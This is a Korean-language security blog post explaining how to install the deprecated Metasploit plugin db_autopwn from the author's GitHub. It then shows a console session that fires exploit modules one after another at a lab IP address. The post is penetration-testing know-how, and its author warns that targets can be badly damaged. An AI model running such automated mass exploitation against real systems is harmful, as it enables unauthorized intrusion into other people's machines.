| | at : |


Archive

[METASPLOIT] Automatic Exploit&Vulnerability Attack Using db_autopwn.rb 하훌 rwxr-xr-x 0 8/17/2017



[METASPLOIT] Automatic Exploit&Vulnerability Attack Using db_autopwn.rb

Permission rw-r--r--
Author 하훌
Date and Time 8/17/2017
Label
License 크리에이티브 커먼즈 라이선스


예전에 Metasploit에는 db_autopwn이라는 plugin이 있었습니다. 다수의 시스템을 테스트하고 공격을 수행해야하는 사람 입장에서 아주 유용할 수 있는 plugin이지만 문제가 있어 공식 버전에서 제외된 plugin이죠.

전설처럼 내려오는 db_autopwn 코드를 통해 따로 plugin으로 넣어준다면 지금도 충분히 사용 가능합니다.

다만 이로인해 Metasploit의 동작에 문제가 생길 수 있고 대상 시스템은 당연히 큰 타격을 입게되니 재미로만 보시는게 좋을 것 같습니다. db_autopwn.rb 코드는 구글링을 통해 찾으시거나 제 git에서 긁어서 사욯하시면 됩니다.
(https://github.com/hahwul/metasploit-db_autopwn)

Install 

코드만 있다면 일반적인 metasploit plugin 설치와 동일합니다.

#> git clone https://github.com/hahwul/metasploit-db_autopwn

또는..

#> wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb

하여 db_autopwn.rb 파일을 받아줍니다. 이 파일을 metasploit의 plugin 디렉토리에 넣어줍니다.

#> cd metasploit-db_autopwn
#> cp db_autopwn.rb [your_metasploit_dir]/plugin


끝!

Usage

#> msfconsole
HAHWUL > load db_autopwn
[*] Successfully loaded plugin: db_autopwn

HAHWUL > db_autopwn -p -R great -e -q 192.168.56.101
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[*] (1/1301 [0 sessions]): Launching exploit/bsdi/softcart/mercantec_softcart against 192.168.56.44:80...
[*] (2/1301 [0 sessions]): Launching exploit/freebsd/http/watchguard_cmd_exec against 192.168.56.44:80...
[*] (3/1301 [0 sessions]): Launching exploit/linux/antivirus/escan_password_exec against 192.168.56.44:80...
[*] (4/1301 [0 sessions]): Launching exploit/linux/http/accellion_fta_getstatus_oauth against 192.168.56.44:80...
[*] (5/1301 [0 sessions]): Launching exploit/linux/http/advantech_switch_bash_env_exec against 192.168.56.44:80...




Share







HAHWUL
HACKING | PENETRATION-TEST | CODING
HACKERONE : GIT : 0DAY-TODAY : EXPLOIT-DB : PACKETSTORM
GOOGLE+ | HAHWUL@GMAIL.COM | TWITTER
WWW.HAHWUL.COM






Recent Post

0 개의 댓글:

댓글 쓰기